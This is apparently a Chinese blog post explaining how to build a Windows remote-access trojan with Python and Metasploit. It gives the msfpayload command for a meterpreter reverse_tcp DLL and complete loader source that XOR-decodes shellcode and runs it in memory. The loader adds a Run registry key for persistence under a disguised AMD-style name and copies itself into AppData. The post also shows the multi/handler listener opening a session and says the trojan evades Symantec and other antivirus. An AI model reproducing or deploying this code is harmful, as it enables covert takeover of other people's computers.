python+msf 制作 windows远控
最近分析的一个远控,后发现是meterpreter rever http shell,文件是个打包的python(打包成exe),感谢wstone的指导~
创建dll
./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll
python
main.py
import sys, os import shutil import time import ctypes import glob import multiprocessing import multiprocessing.forking from sc import sc from win32file import GetLongPathName import _winreg from itertools import izip, cycle from utils import getppid, kill, get_base_dir RECONNECT_SLEEP = 60 STARTUP_SLEEP = 30 CHILD_STARTUP_SLEEP = 10 METER_NAME = "aticlex.exe" METER_DIR = "AMD" USER_DIR = os.path.expanduser("~") try: from win32com.shell import shellcon, shell APPDATA_DIR = shell.SHGetFolderPath(0, shellcon.CSIDL_APPDATA, 0, 0) DATA_DIR = os.path.join(APPDATA_DIR, METER_DIR) except: DATA_DIR = os.path.join(USER_DIR, METER_DIR) METER_PATH = os.path.join(DATA_DIR, METER_NAME) class _Popen(multiprocessing.forking.Popen): def __init__(self, *args, **kw): if hasattr(sys, 'frozen'): os.putenv('_MEIPASS2', sys._MEIPASS) try: super(_Popen, self).__init__(*args, **kw) finally: if hasattr(sys, 'frozen'): os.unsetenv('_MEIPASS2') class Process(multiprocessing.Process): _Popen = _Popen class Worker(Process): def xor(self, data, key='\x41\x82\x99\x73\x12\xf8\x0e\x38'): return ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key))) def run(self): time.sleep(CHILD_STARTUP_SLEEP) code = self.xor(sc) cbuf = ctypes.create_string_buffer(code) func = ctypes.cast(cbuf, ctypes.CFUNCTYPE(ctypes.HRESULT)) func() def install(): reg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER) key = _winreg.OpenKey(reg, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, _winreg.KEY_ALL_ACCESS) _winreg.SetValueEx(key, METER_NAME.split(".")[0], 0, _winreg.REG_SZ, METER_PATH) path = GetLongPathName(sys.executable) if path != METER_PATH: if not os.path.exists(DATA_DIR): os.makedirs(DATA_DIR) try: shutil.copy(path, METER_PATH) except Exception as e: sys.exit(1) os.execve(METER_PATH, [METER_PATH], os.environ) def clean(): try: base_dir = get_base_dir() temp_dir = os.path.abspath(os.path.join(base_dir, os.pardir)) mei = base_dir.split("\\")[-1] pattern = "%s\\_MEI*" % temp_dir for path in glob.glob(pattern): path = GetLongPathName(path) if path != base_dir and mei.lower() not in path.lower(): try: shutil.rmtree(path) except: pass except: pass def main(): kill(getppid()) time.sleep(STARTUP_SLEEP) install() clean() while True: p = Worker() p.daemon = True p.start() p.join() time.sleep(RECONNECT_SLEEP) if __name__ == "__main__": multiprocessing.freeze_support() main()
sc.py
1 2 3 | sc = '\x12\x34' ......... # sc = sc.dll open with rb mode |
然后pythoninstall 生成exe。
监听:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | msf > use exploit / multi / handler msf exploit(handler) > set payload windows / meterpreter / reverse_tcp payload = > windows / meterpreter / reverse_tcp msf exploit(handler) > set lhost 192.168 . 1.123 lhost = > 192.168 . 1.123 msf exploit(handler) > set lport 4444 lport = > 4444 msf exploit(handler) > run [ * ] Started reverse handler on 192.168 . 1.123 : 4444 [ * ] Starting the payload handler... [ * ] Sending stage ( 770048 bytes) to 192.168 . 1.80 [ * ] Meterpreter session 1 opened ( 192.168 . 1.123 : 4444 - > 192.168 . 1.80 : 1138 ) at 2014 - 10 - 22 19 : 03 : 43 - 0500 meterpreter > |
木马特征:
添加注册表启动项,定时load msf payload,过赛门铁克等杀软。
--- --- --- --- From 小小leo 的博客 --- --- --- ---
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步